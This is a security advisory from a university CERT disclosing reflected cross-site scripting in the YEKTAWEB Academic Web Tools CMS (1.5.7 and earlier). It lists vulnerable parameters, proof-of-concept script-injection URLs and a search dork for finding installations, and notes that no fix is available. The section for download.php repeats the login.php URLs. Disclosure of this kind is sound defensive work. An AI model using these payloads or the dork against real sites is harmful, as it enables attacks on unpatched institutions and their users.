============================================ IUT-CERT ============================================ Title: Academic Web Tools CMS Multiple XSS Vendor: www.yektaweb.com Vulnerable Version: 1.5.7 and priors Type: XSS Fix: N/A Dork: AWT YEKTA ============================================ nsec.ir ============================================ Description: ------------------ YEKTAWEB Academic Web Tools is a Persian Content Management System (CMS) for managing university affairs such as conferences, journals and etc. The built-in filter of this package can not prevent XSS attack on some parameters. Vulnerabilities: ------------------ 1- Cross Site Scripting (XSS) in "/page.php" in "sid","logincase" and "redirect" parameters. http://yoursite/page.php?sid=[XSS] http://yoursite/page.php?logincase=[XSS] http://yoursite/page.php?redirect=[XSS] 2- Cross Site Scripting (XSS) in "/page_arch.php" in "sid","logincase" and "redirect" parameters. http://yoursite/page_arch.php?sid=[XSS] http://yoursite/page_arch.php?logincase=[XSS] http://yoursite/page_arch.php?redirect=[XSS] 3- Cross Site Scripting (XSS) in "/login.php" in "sid" ,"logincase" and "redirect" parameters. http://yoursite/login.php?sid=[XSS] http://yoursite/login.php?logincase=[XSS] http://yoursite/login.php?redirect=[XSS] 4- Cross Site Scripting (XSS) in "/download.php" in "sid" ,"logincase" and "redirect" parameters. http://yoursite/login.php?sid=[XSS] http://yoursite/login.php?logincase=[XSS] http://yoursite/login.php?redirect=[XSS] Exploit/PoC: ------------------ Example: http://yoursite/login.php?slct_pg_id=53&sid=1*/--></script><script>alert(188017)</script>&slc_lang=fa http://yoursite/page_arch.php?slc_lang=fa&sid=1&logincase=*/--></script><script>alert(188017)</script> http://yoursite/page.php?sid=1&slc_lang=en&redirect=*/--></script><script>alert(188017)</script> Solution: ------------------ Input Validation Filter should be patched. Credit: ------------------ Isfahan University of Technology - Computer Emergency Response Team Thanks to : M. R. Faghani, N. Fathi, E. Aerabi, E. Jafari